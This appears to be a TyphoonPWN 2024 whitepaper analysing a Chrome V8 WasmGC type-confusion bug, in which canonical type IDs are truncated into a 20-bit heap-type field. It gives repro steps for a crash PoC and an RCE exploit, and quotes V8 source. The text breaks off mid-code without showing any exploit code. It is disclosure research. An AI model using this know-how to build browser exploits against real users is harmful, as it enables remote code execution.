# TyphoonPWN 2024 Whitepaper Submitted by Seunghyun Lee (Xion, @0x10n) ## Target Google Chrome RCE (no sandbox) ## Repro (Minimal PoC) 1. Run a webserver to serve the given `poc.html` file (e.g. `python3 -m http.server -b 127.0.0.1 8000`) - `poc.js`, `wasm-module-builder.js` should also be served together from the same path 2. Start Chrome 3. Browse to `http://127.0.0.1:8000/poc.html` Result should be an immediate crash with `STATUS_ACCESS_VIOLATION`. ## Repro (RCE) 1. Run a webserver to serve the given `exp.html` file (e.g. `python3 -m http.server -b 127.0.0.1 8000`) - ~~`exp.js`, `wasm-module-builder.js` should also be served together from the same path~~ - Corresponding script files are inlined into `exp.html` due to potential caching issues 2. Start Chrome with `--no-sandbox` flag 3. Browse to `http://127.0.0.1:8000/exp.html` Result should be a command prompt opening with arbitrary commands executed (`echo`ing of some ASCII art). ## TL;DR WASM isorecursive canonical type id <-> `wasm::HeapType` / `wasm::ValueType` confusion in JS-to-WASM conversion functions and their wrappers (`FromJS()`, `(Wasm)JSToWasmObject()`, etc.), resulting in type confusion between arbitrary WASM types. This can be considered a variant bug of [CVE-2024-2887](https://www.zerodayinitiative.com/blog/2024/5/2/cve-2024-2887-a-pwn2own-winning-bug-in-google-chrome) discovered by Manfred Paul and presented in Pwn2Own Vancouver 2024. ## Bug / Root Cause Analysis [Types in WasmGC](https://github.com/WebAssembly/gc/blob/main/proposals/gc/MVP.md) are canonicalized to allow cross-module type checking. As WasmGC allows isorecursive types, type comparison between types from each of their own recursive groups located in different modules needs to be supported. V8 implements this by "canonicalizing" all types from all modules in a single isolate into a uniquely identified `uint32_t` index. This process is implemented in https://source.chromium.org/chromium/chromium/src/+/main:v8/src/wasm/canonical-types.cc, but a very simple TL;DR would be: 1. Canonicalize type indexes in a recursive group by the following rule: 1. Type indexes already defined (outside of its recursive group) -> use the already canonicalized value 2. Type indexes representing a different type within the same group -> compute relative type index from the first type and mark as relative 2. If the canonicalized recursive group already exists in the database, use the saved indexes 3. Else, save the recursive group into the database and create new indexes (incrementally) In this way, WasmGC supports a notion of structural type equivalence - i.e. `(type $t1 (struct (mut i32) (mut i64)))` from module M1 is equivalent to `(type $t2 (struct (mut i32) (mut i64)))` from module M2 when canonicalized in any order, extend this to more complex recursive groups and the idea still holds. The global canonicalization database is managed by a singleton class `TypeCanonicalizer`: ```cpp TypeCanonicalizer* GetTypeCanonicalizer() { return GetWasmEngine()->type_canonicalizer(); } class TypeCanonicalizer { public: static constexpr uint32_t kPredefinedArrayI8Index = 0; static constexpr uint32_t kPredefinedArrayI16Index = 1; static constexpr uint32_t kNumberOfPredefinedTypes = 2; //... private: //... std::vector canonical_supertypes_; // Maps groups of size >=2 to the canonical id of the first type. std::unordered_map> canonical_groups_; // Maps group of size 1 to the canonical id of the type. std::unordered_map> canonical_singleton_groups_; // ... }; ``` A canonical type id is a globally unique id of type `uint32_t` representing the specific WasmGC type within the isolate. `canonical_supertypes_` is a vector representing the subtyping relationship between types, where `canonical_supertypes_[sub] = super` represents that `super` is the supertype of `sub` (all in canonical type ids). Each WASM module saves a vector to convert its internal type index to the canonicalized type index: ```cpp struct V8_EXPORT_PRIVATE WasmModule { //... std::vector types; // by type index // Maps each type index to its global (cross-module) canonical index as per // isorecursive type canonicalization. std::vector isorecursive_canonical_type_ids; //... } ``` In this case, `isorecursive_canonical_type_ids[t] = c` means that the type index `t` is canonicalized into the type id `c`. Note that the maximum number of type index `t` that a single WASM module can have is `kV8MaxWasmTypes`, which is `1000000`. This is enforced in the decoding phase, [`DecodeTypeSection()`](https://source.chromium.org/chromium/chromium/src/+/main:v8/src/wasm/module-decoder-impl.h;l=619). However, an important observation is that canonical type id is not bound to `kV8MaxWasmTypes` in any way - it can grow as much as the host memory supports, as we can simply make more WASM modules with different types. A quick xref to see how `isorecursive_canonical_type_ids` is used returns [`WasmWrapperGraphBuilder::FromJS()`](https://source.chromium.org/chromium/chromium/src/+/main:v8/src/compiler/wasm-compiler.cc;l=7311), runtime function [`WasmJSToWasmObject()`](https://source.chromium.org/chromium/chromium/src/+/main:v8/src/runtime/runtime-wasm.cc;l=186) calling into [`JSToWasmObject()`](https://source.chromium.org/chromium/chromium/src/+/main:v8/src/wasm/wasm-objects.cc;l=2551), etc. Taking a look into the former we see the following code: ```cpp Node* FromJS(Node* input, Node* js_context, wasm::ValueType type, const wasm::WasmModule* module, Node* frame_state = nullptr) { switch (type.kind()) { case wasm::kRef: case wasm::kRefNull: { switch (type.heap_representation_non_shared()) { //... case wasm::HeapType::kNone: case wasm::HeapType::kNoFunc: case wasm::HeapType::kI31: case wasm::HeapType::kAny: case wasm::HeapType::kFunc: case wasm::HeapType::kStruct: case wasm::HeapType::kArray: case wasm::HeapType::kEq: default: { // Make sure ValueType fits in a Smi. static_assert(wasm::ValueType::kLastUsedBit + 1 <= kSmiValueSize); if (type.has_index()) { DCHECK_NOT_NULL(module); uint32_t canonical_index = module->isorecursive_canonical_type_ids[type.ref_index()]; type = wasm::ValueType::RefMaybeNull(canonical_index, // [!] canonical type id used as wasm::HeapType type.nullability()); } Node* inputs[] = { input, mcgraph()->IntPtrConstant( IntToSmi(static_cast(type.raw_bit_field())))}; return BuildCallToRuntimeWithContext(Runtime::kWasmJSToWasmObject, js_context, inputs, 2); } } } //... } } ``` On a JS-to-Wasm conversion boundary, this function is set up to run. Note how the canonical index `canonical_index` of the ref'd type is wrapped into `wasm::ValueType::RefMaybeNull()` and passed to the runtime function `WasmJSToWasmObject()` eventually reaching `JSToWasmObject()`. `wasm::ValueType` is defined as the following: ```cpp // A ValueType is encoded by two components: a ValueKind and a heap // representation (for reference types/rtts). Those are encoded into 32 bits // using base::BitField. The underlying ValueKind enumeration includes four // elements which do not strictly correspond to value types: the two packed // types i8 and i16, the void type (for control structures), and a bottom value // (for internal use). // ValueType encoding includes an additional bit marking the index of a type as // relative. This should only be used during type canonicalization. class ValueType { public: //... static constexpr ValueType RefMaybeNull(uint32_t heap_type, Nullability nullability) { DCHECK(HeapType(heap_type).is_valid()); return ValueType( KindField::encode(nullability == kNullable ? kRefNull : kRef) | HeapTypeField::encode(heap_type)); // [!] } //... /**************************** Static constants ******************************/ static constexpr int kLastUsedBit = 25; static constexpr int kKindBits = 5; static constexpr int kHeapTypeBits = 20; static const intptr_t kBitFieldOffset; private: // {hash_value} directly reads {bit_field_}. friend size_t hash_value(ValueType type); using KindField = base::BitField; using HeapTypeField = KindField::Next; // [!] HeapType, 20 bits wide // Marks a type as a canonical type which uses an index relative to its // recursive group start. Used only during type canonicalization. using CanonicalRelativeField = HeapTypeField::Next; //... } ``` We now clearly see that the `heap_type` isn't actually designed to store a canonical type id ranging a full `uint32_t`, but instead is designed to store `wasm::HeapType` - there is a confusion between the two type representations (canonicalized type id vs. type index). As `wasm::HeapType` can always be represented with 20bits, the initializer (and getters, omitted in the snippet) always truncate this value to 20bits. This results in the first exploitable vulnerability - JS-to-Wasm type check may confuse canonical type ids `t1` and `t2` if `(t1 & 0xfffff) == (t2 & 0xfffff)`. Specifically, for a JS-to-Wasm boundary that is typechecked to receive objects of canonical type id `tn = t0 + 0x100000 * n` where `0 < t0 < 0x100000`, it instead performs a runtime type check with the truncated `t0` instead. Simply put, objects of type `t0` and its subtypes can bypass type checks against `tn` and pass the JS-to-Wasm conversion, resulting in further type confusion. But there is another exploitable vulnerability, much more simpler than working with index wraparounds. The code confuses canonical type id with `wasm::HeapType`, so could there be cases where the canonical type id is misused as a `wasm::HeapType`? Of course there is, follow through the call chain to reach `JSToWasmObject()`: ```cpp class HeapType { public: enum Representation : uint32_t { kFunc = kV8MaxWasmTypes, // shorthand: c kEq, // shorthand: q kI31, // shorthand: j kStruct, // shorthand: o kArray, // shorthand: g kAny, // // [!] top type ("any") kExtern, // shorthand: a. //... }; //... } namespace wasm { MaybeHandle